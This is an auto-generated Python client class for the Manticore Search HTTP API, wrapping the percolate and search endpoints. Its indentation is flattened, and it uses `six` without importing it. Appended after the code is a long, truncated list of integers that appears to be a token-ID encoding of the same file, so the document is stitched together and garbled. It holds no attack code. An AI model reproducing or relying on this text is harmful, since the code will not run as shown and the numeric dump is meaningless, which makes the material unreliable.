from manticoresearch.api_client import ApiClient
from manticoresearch.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class SearchApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def percolate(self, index, percolate_request, **kwargs): # noqa: E501
"""Perform reverse search on a percolate index # noqa: E501
Performs a percolate search. This method must be used only on percolate indexes. Expects two parameters: the index name and an object with array of documents to be tested. An example of the documents object: ``` {\"query\":{\"percolate\":{\"document\":{\"content\":\"sample content\"}}}} ``` Responds with an object with matched stored queries: ``` {'timed_out':false,'hits':{'total':2,'max_score':1,'hits':[{'_index':'idx_pq_1','_type':'doc','_id':'2','_score':'1','_source':{'query':{'match':{'title':'some'},}}},{'_index':'idx_pq_1','_type':'doc','_id':'5','_score':'1','_source':{'query':{'ql':'some | none'}}}]}} ``` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.percolate(index, percolate_request, async_req=True)
>>> result = thread.get()
:param index: Name of the percolate index (required)
:type index: str
:param percolate_request: (required)
:type percolate_request: PercolateRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: SearchResponse
"""
kwargs['_return_http_data_only'] = True
return self.percolate_with_http_info(index, percolate_request, **kwargs) # noqa: E501
def percolate_with_http_info(self, index, percolate_request, **kwargs): # noqa: E501
"""Perform reverse search on a percolate index # noqa: E501
Performs a percolate search. This method must be used only on percolate indexes. Expects two parameters: the index name and an object with array of documents to be tested. An example of the documents object: ``` {\"query\":{\"percolate\":{\"document\":{\"content\":\"sample content\"}}}} ``` Responds with an object with matched stored queries: ``` {'timed_out':false,'hits':{'total':2,'max_score':1,'hits':[{'_index':'idx_pq_1','_type':'doc','_id':'2','_score':'1','_source':{'query':{'match':{'title':'some'},}}},{'_index':'idx_pq_1','_type':'doc','_id':'5','_score':'1','_source':{'query':{'ql':'some | none'}}}]}} ``` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.percolate_with_http_info(index, percolate_request, async_req=True)
>>> result = thread.get()
:param index: Name of the percolate index (required)
:type index: str
:param percolate_request: (required)
:type percolate_request: PercolateRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(SearchResponse, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'index',
'percolate_request'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method percolate" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'index' is set
if self.api_client.client_side_validation and ('index' not in local_var_params or # noqa: E501
local_var_params['index'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `index` when calling `percolate`") # noqa: E501
# verify the required parameter 'percolate_request' is set
if self.api_client.client_side_validation and ('percolate_request' not in local_var_params or # noqa: E501
local_var_params['percolate_request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `percolate_request` when calling `percolate`") # noqa: E501
collection_formats = {}
path_params = {}
if 'index' in local_var_params:
path_params['index'] = local_var_params['index'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'percolate_request' in local_var_params:
body_params = local_var_params['percolate_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
res = self.api_client.call_api(
'/json/pq/{index}/search', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SearchResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
return res
def search(self, search_request, **kwargs): # noqa: E501
"""Performs a search # noqa: E501
Expects an object with mandatory properties: * the index name * the match query object Example : ``` {'index':'movies','query':{'bool':{'must':[{'query_string':' movie'}]}},'script_fields':{'myexpr':{'script':{'inline':'IF(rating>8,1,0)'}}},'sort':[{'myexpr':'desc'},{'_score':'desc'}],'profile':true} ``` It responds with an object with: - time of execution - if the query timed out - an array with hits (matched documents) - additional, if profiling is enabled, an array with profiling information is attached ``` {'took':10,'timed_out':false,'hits':{'total':2,'hits':[{'_id':'1','_score':1,'_source':{'gid':11}},{'_id':'2','_score':1,'_source':{'gid':12}}]}} ``` For more information about the match query syntax, additional paramaters that can be set to the input and response, please check: https://manual.manticoresearch.com/Searching/Full_text_matching/Basic_usage#HTTP. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search(search_request, async_req=True)
>>> result = thread.get()
:param search_request: (required)
:type search_request: SearchRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: SearchResponse
"""
kwargs['_return_http_data_only'] = True
return self.search_with_http_info(search_request, **kwargs) # noqa: E501
def search_with_http_info(self, search_request, **kwargs): # noqa: E501
"""Performs a search # noqa: E501
Expects an object with mandatory properties: * the index name * the match query object Example : ``` {'index':'movies','query':{'bool':{'must':[{'query_string':' movie'}]}},'script_fields':{'myexpr':{'script':{'inline':'IF(rating>8,1,0)'}}},'sort':[{'myexpr':'desc'},{'_score':'desc'}],'profile':true} ``` It responds with an object with: - time of execution - if the query timed out - an array with hits (matched documents) - additional, if profiling is enabled, an array with profiling information is attached ``` {'took':10,'timed_out':false,'hits':{'total':2,'hits':[{'_id':'1','_score':1,'_source':{'gid':11}},{'_id':'2','_score':1,'_source':{'gid':12}}]}} ``` For more information about the match query syntax, additional paramaters that can be set to the input and response, please check: https://manual.manticoresearch.com/Searching/Full_text_matching/Basic_usage#HTTP. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_with_http_info(search_request, async_req=True)
>>> result = thread.get()
:param search_request: (required)
:type search_request: SearchRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(SearchResponse, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'search_request'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method search" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'search_request' is set
if self.api_client.client_side_validation and ('search_request' not in local_var_params or # noqa: E501
local_var_params['search_request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `search_request` when calling `search`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'search_request' in local_var_params:
body_params = local_var_params['search_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
res = self.api_client.call_api(
'/json/search', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SearchResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
return res
| [
2,
19617,
25,
3384,
69,
12,
23,
198,
198,
2,
337,
5109,
382,
11140,
20985,
198,
2,
15069,
357,
66,
8,
12131,
12,
1238,
2481,
11,
337,
5109,
382,
10442,
42513,
357,
5450,
1378,
76,
5109,
382,
12947,
13,
785,
8,
198,
2,
220,
198,
2,
1439,
2489,
10395,
198,
2,
628,
198,
198,
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
198,
198,
11748,
302,
220,
1303,
645,
20402,
25,
376,
21844,
198,
198,
2,
21015,
362,
290,
21015,
513,
17764,
5888,
198,
11748,
2237,
198,
6738,
2237,
13,
76,
5241,
13,
333,
297,
571,
13,
29572,
1330,
9577,
198,
198,
6738,
285,
5109,
382,
12947,
13,
15042,
62,
16366,
1330,
5949,
72,
11792,
198,
6738,
285,
5109,
382,
12947,
13,
1069,
11755,
1330,
357,
220,
1303,
645,
20402,
25,
376,
21844,
198,
220,
220,
220,
5949,
72,
6030,
12331,
11,
198,
220,
220,
220,
5949,
72,
11395,
12331,
198,
8,
628,
198,
4871,
11140,
32,
14415,
7,
15252,
2599,
198,
220,
220,
220,
37227,
16580,
25,
770,
1398,
318,
8295,
7560,
416,
4946,
17614,
35986,
198,
220,
220,
220,
6524,
25,
3740,
1378,
9654,
15042,
12,
8612,
1352,
13,
13670,
628,
220,
220,
220,
2141,
407,
4370,
262,
1398,
14500,
13,
198,
220,
220,
220,
37227,
628,
220,
220,
220,
825,
583,
4033,
378,
7,
944,
11,
6376,
11,
583,
4033,
378,
62,
25927,
11,
12429,
46265,
22046,
2599,
220,
1303,
645,
20402,
25,
412,
33548,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
5990,
687,
9575,
2989,
319,
257,
583,
4033,
378,
6376,
220,
1303,
645,
20402,
25,
412,
33548,
628,
220,
220,
220,
220,
220,
220,
220,
2448,
23914,
257,
583,
4033,
378,
2989,
13,
220,
770,
2446,
1276,
307,
973,
691,
319,
583,
4033,
378,
39199,
13,
220,
23600,
82,
734,
10007,
25,
262,
6376,
1438,
290,
281,
2134,
351,
7177,
286,
4963,
284,
307,
6789,
13,
1052,
1672,
286,
262,
4963,
2134,
25,
220,
220,
220,
7559,
63,
220,
220,
1391,
7879,
22766,
30478,
90,
7879,
525,
4033,
378,
30478,
90,
7879,
22897,
30478,
90,
7879,
11299,
30478,
7879,
39873,
2695,
7879,
11709,
11709,
220,
220,
7559,
63,
220,
10328,
24764,
351,
281,
2134,
351,
14451,
8574,
20743,
25,
220,
220,
220,
220,
7559,
63,
220,
220,
1391,
6,
16514,
276,
62,
448,
10354,
9562,
4032,
71,
896,
10354,
90,
6,
23350,
10354,
17,
4032,
9806,
62,
26675,
10354,
16,
4032,
71,
896,
10354,
58,
90,
6,
62,
9630,
10354,
6,
312,
87,
62,
79,
80,
62,
16,
41707,
62,
4906,
10354,
6,
15390,
41707,
62,
312,
10354,
6,
17,
41707,
62,
26675,
10354,
6,
16,
41707,
62,
10459,
10354,
90,
6,
22766,
10354,
90,
6,
15699,
10354,
90,
6,
7839,
10354,
6,
11246,
6,
5512,
11709,
5512,
90,
6,
62,
9630,
10354,
6,
312,
87,
62,
79,
80,
62,
16,
41707,
62,
4906,
10354,
6,
15390,
41707,
62,
312,
10354,
6,
20,
41707,
62,
26675,
10354,
6,
16,
41707,
62,
10459,
10354,
90,
6,
22766,
10354,
90,
6,
13976,
10354,
6,
11246,
930,
4844,
6,
42535,
60,
11709,
220,
220,
7559,
63,
220,
220,
1303,
645,
20402,
25,
412,
33548,
198,
220,
220,
220,
220,
220,
220,
220,
770,
2446,
1838,
257,
18305,
516,
14626,
2581,
416,
4277,
13,
1675,
787,
281,
198,
220,
220,
220,
220,
220,
220,
220,
39354,
14626,
2581,
11,
3387,
1208,
30351,
62,
42180,
28,
17821,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
4704,
796,
40391,
13,
525,
4033,
378,
7,
9630,
11,
583,
4033,
378,
62,
25927,
11,
30351,
62,
42180,
28,
17821,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
1255,
796,
4704,
13,
1136,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
6376,
25,
6530,
286,
262,
583,
4033,
378,
6376,
357,
35827,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
4906,
6376,
25,
965,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
583,
4033,
378,
62,
25927,
25,
357,
35827,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
4906,
583,
4033,
378,
62,
25927,
25,
2448,
4033,
378,
18453,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
30351,
62,
42180,
25,
10127,
284,
12260,
262,
2581,
355,
24871,
3481,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
4906,
30351,
62,
42180,
25,
20512,
11,
11902,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
4808,
3866,
2220,
62,
11299,
25,
611,
10352,
11,
262,
2956,
297,
571,
18,
13,
6535,
51,
4805,
9774,
2591,
2134,
481,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
307,
4504,
1231,
3555,
14,
12501,
7656,
2882,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
13,
15161,
318,
6407,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
4906,
4808,
3866,
2220,
62,
11299,
25,
20512,
11,
11902,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
4808,
25927,
62,
48678,
25,
26827,
4634,
329,
428,
2581,
13,
1002,
530,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1271,
2810,
11,
340,
481,
307,
2472,
2581,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
26827,
13,
632,
460,
635,
307,
257,
5166,
357,
83,
29291,
8,
286,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
357,
38659,
11,
1100,
8,
640,
5269,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
7783,
25,
16409,
262,
1255,
2134,
13,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1002,
262,
2446,
318,
1444,
355,
24871,
3481,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5860,
262,
2581,
4704,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
81,
4906,
25,
11140,
31077,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
479,
86,
22046,
17816,
62,
7783,
62,
4023,
62,
7890,
62,
8807,
20520,
796,
6407,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
2116,
13,
525,
4033,
378,
62,
4480,
62,
4023,
62,
10951,
7,
9630,
11,
583,
4033,
378,
62,
25927,
11,
12429,
46265,
22046,
8,
220,
1303,
645,
20402,
25,
412,
33548,
628,
220,
220,
220,
825,
583,
4033,
378,
62,
4480,
62,
4023,
62,
10951,
7,
944,
11,
6376,
11,
583,
4033,
378,
62,
25927,
11,
12429,
46265,
22046,
2599,
220,
1303,
645,
20402,
25,
412,
33548,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
5990,
687,
9575,
2989,
319,
257,
583,
4033,
378,
6376,
220,
1303,
645,
20402,
25,
412,
33548,
628,
220,
220,
220,
220,
220,
220,
220,
2448,
23914,
257,
583,
4033,
378,
2989,
13,
220,
770,
2446,
1276,
307,
973,
691,
319,
583,
4033,
378,
39199,
13,
220,
23600,
82,
734,
10007,
25,
262,
6376,
1438,
290,
281,
2134,
351,
7177,
286,
4963,
284,
307,
6789,
13,
1052,
1672,
286,
262,
4963,
2134,
25,
220,
220,
220,
7559,
63,
220,
220,
1391,
7879,
22766,
30478,
90,
7879,
525,
4033,
378,
30478,
90,
7879,
22897,
30478,
90,
7879,
11299,
30478,
7879,
39873,
2695,
7879,
11709,
11709,
220,
220,
7559,
63,
220,
10328,
24764,
351,
281,
2134,
351,
14451,
8574,
20743,
25,
220,
220,
220,
220,
7559,
63,
220,
220,
1391,
6,
16514,
276,
62,
448,
10354,
9562,
4032,
71,
896,
10354,
90,
6,
23350,
10354,
17,
4032,
9806,
62,
26675,
10354,
16,
4032,
71,
896,
10354,
58,
90,
6,
62,
9630,
10354,
6,
312,
87,
62,
79,
80,
62,
16,
41707,
62,
4906,
10354,
6,
15390,
41707,
62,
312,
10354,
6,
17,
41707,
62,
26675,
10354,
6,
16,
41707,
62,
10459,
10354,
90,
6,
22766,
10354,
90,
6,
15699,
10354,
90,
6,
7839,
10354,
6,
11246,
6,
5512,
11709,
5512,
90,
6,
62,
9630,
10354,
6,
312,
87,
62,
79,
80,
62,
16,
41707,
62,
4906,
10354,
6,
15390,
41707,
62,
312,
10354,
6,
20,
41707,
62,
26675,
10354,
6,
16,
41707,
62,
10459,
10354,
90,
6,
22766,
10354,
90,
6,
13976,
10354,
6,
11246,
930,
4844,
6,
42535,
60,
11709,
220,
220,
7559,
63,
220,
220,
1303,
645,
20402,
25,
412,
33548,
198,
220,
220,
220,
220,
220,
220,
220,
770,
2446,
1838,
257,
18305,
516,
14626,
2581,
416,
4277,
13,
1675,
787,
281,
198,
220,
220,
220,
220,
220,
220,
220,
39354,
14626,
2581,
11,
3387,
1208,
30351,
62,
42180,
28,
17821,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
4704,
796,
40391,
13,
525,
4033,
378,
62,
4480,
62,
4023,
62,
10951,
7,
9630,
11,
583,
4033,
378,
62,
25927,
11,
30351,
62,
42180,
28,
17821,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
1255,
796,
4704,
13,
1136,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
6376,
25,
6530,
286,
262,
583,
4033,
378,
6376,
357,
35827,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
4906,
6376,
25,
965,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
583,
4033,
378,
62,
25927,
25,
357,
35827,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
4906,
583,
4033,
378,
62,
25927,
25,
2448,
4033,
378,
18453,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
30351,
62,
42180,
25,
10127,
284,
12260,
262,
2581,
355,
24871,
3481,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
4906,
30351,
62,
42180,
25,
20512,
11,
11902,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
4808,
7783,
62,
4023,
62,
7890,
62,
8807,
25,
2882,
1366,
1231,
1182,
3722,
2438,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
290,
24697,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
4906,
4808,
7783,
62,
4023,
62,
7890,
62,
8807,
25,
20512,
11,
11902,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
4808,
3866,
2220,
62,
11299,
25,
611,
10352,
11,
262,
2956,
297,
571,
18,
13,
6535,
51,
4805,
9774,
2591,
2134,
481,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
307,
4504,
1231,
3555,
14,
12501,
7656,
2882,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
13,
15161,
318,
6407,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
4906,
4808,
3866,
2220,
62,
11299,
25,
20512,
11,
11902,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
4808,
25927,
62,
48678,
25,
26827,
4634,
329,
428,
2581,
13,
1002,
530,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1271,
2810,
11,
340,
481,
307,
2472,
2581,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
26827,
13,
632,
460,
635,
307,
257,
5166,
357,
83,
29291,
8,
286,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
357,
38659,
11,
1100,
8,
640,
5269,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
4808,
25927,
62,
18439,
25,
900,
284,
20957,
262,
6284,
62,
33692,
329,
281,
257,
2060,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2581,
26,
428,
6840,
24245,
262,
18239,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
287,
262,
1020,
329,
257,
2060,
2581,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
4906,
4808,
25927,
62,
18439,
25,
8633,
11,
11902,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
7783,
25,
16409,
262,
1255,
2134,
13,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1002,
262,
2446,
318,
1444,
355,
24871,
3481,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5860,
262,
2581,
4704,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
81,
4906,
25,
46545,
7,
18243,
31077,
11,
3722,
62,
8189,
7,
600,
828,
24697,
7,
40717,
39681,
35,
713,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
1957,
62,
7785,
62,
37266,
796,
17205,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
477,
62,
37266,
796,
685,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
9630,
3256,
220,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
525,
4033,
378,
62,
25927,
6,
198,
220,
220,
220,
220,
220,
220,
220,
2361,
198,
220,
220,
220,
220,
220,
220,
220,
477,
62,
37266,
13,
2302,
437,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
685,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
292,
13361,
62,
42180,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
62,
7783,
62,
4023,
62,
7890,
62,
8807,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
62,
3866,
2220,
62,
11299,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
62,
25927,
62,
48678,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
62,
25927,
62,
18439,
6,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2361,
198,
220,
220,
220,
220,
220,
220,
220,
1267,
198,
220,
220,
220,
220,
220,
220,
220,
329,
1994,
11,
1188,
287,
2237,
13,
2676,
23814,
7,
12001,
62,
7785,
62,
37266,
17816,
46265,
22046,
20520,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
1994,
407,
287,
477,
62,
37266,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5298,
5949,
72,
6030,
12331,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
30074,
281,
10059,
21179,
4578,
705,
4,
82,
29653,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
284,
2446,
583,
4033,
378,
1,
4064,
1994,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1267,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1957,
62,
7785,
62,
37266,
58,
2539,
60,
796,
1188,
198,
220,
220,
220,
220,
220,
220,
220,
1619,
1957,
62,
7785,
62,
37266,
17816,
46265,
22046,
20520,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
11767,
262,
2672,
11507,
705,
9630,
6,
318,
900,
198,
220,
220,
220,
220,
220,
220,
220,
611,
2116,
13,
15042,
62,
16366,
13,
16366,
62,
1589,
62,
12102,
341,
290,
19203,
9630,
6,
407,
287,
1957,
62,
7785,
62,
37266,
393,
220,
1303,
645,
20402,
25,
412,
33548,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1957,
62,
7785,
62,
37266,
17816,
9630,
20520,
318,
6045,
2599,
220,
1303,
645,
20402,
25,
412,
33548,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5298,
5949,
72,
11395,
12331,
7203,
43730,
262,
2672,
11507,
4600,
9630,
63,
618,
4585,
4600,
525,
4033,
378,
63,
4943,
220,
1303,
645,
20402,
25,
412,
33548,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
11767,
262,
2672,
11507,
705,
525,
4033,
378,
62,
25927,
6,
318,
900,
198,
220,
220,
220,
220,
220,
220,
220,
611,
2116,
13,
15042,
62,
16366,
13,
16366,
62,
1589,
62,
12102,
341,
290,
19203,
525,
4033,
378,
62,
25927,
6,
407,
287,
1957,
62,
7785,
62,
37266,
393,
220,
1303,
645,
20402,
25,
412,
33548,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1957,
62,
7785,
62,
37266,
17816,
525,
4033,
378,
62,
25927,
20520,
318,
6045,
2599,
220,
1303,
645,
20402,
25,
412,
33548,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5298,
5949,
72,
11395,
12331,
7203,
43730,
262,
2672,
11507,
4600,
525,
4033,
378,
62,
25927,
63,
618,
4585,
4600,
525,
4033,
378,
63,
4943,
220,
1303,
645,
20402,
25,
412,
33548,
628,
220,
220,
220,
220,
220,
220,
220,
4947,
62,
687,
1381,
796,
23884,
628,
220,
220,
220,
220,
220,
220,
220,
3108,
62,
37266,
796,
23884,
198,
220,
220,
220,
220,
220,
220,
220,
611,
705,
9630,
6,
287,
1957,
62,
